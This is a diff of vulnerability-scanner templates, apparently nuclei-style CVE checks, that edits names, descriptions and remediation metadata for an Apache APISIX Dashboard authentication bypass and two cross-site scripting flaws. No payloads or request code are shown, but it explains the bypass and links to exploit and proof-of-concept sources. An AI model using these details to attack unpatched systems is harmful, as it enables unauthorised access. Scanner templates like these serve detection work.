name: Apache APISIX Dashboard API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication.
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
reference:
- https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
- https://github.com/pingpongcult/CVE-2021-45232
@ -33,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-45380.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-45380
info:
name: AppCMS - Reflected Cross-Site Scripting (XSS)
name: AppCMS - Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
reference:
- https://github.com/source-trace/appcms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-46005.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-46005
info:
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting
author: cckuailong
severity: medium
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.
reference:
- https://www.exploit-db.com/exploits/49546
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
@ -109,3 +109,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

Some files were not shown because too many files have changed in this diff Show More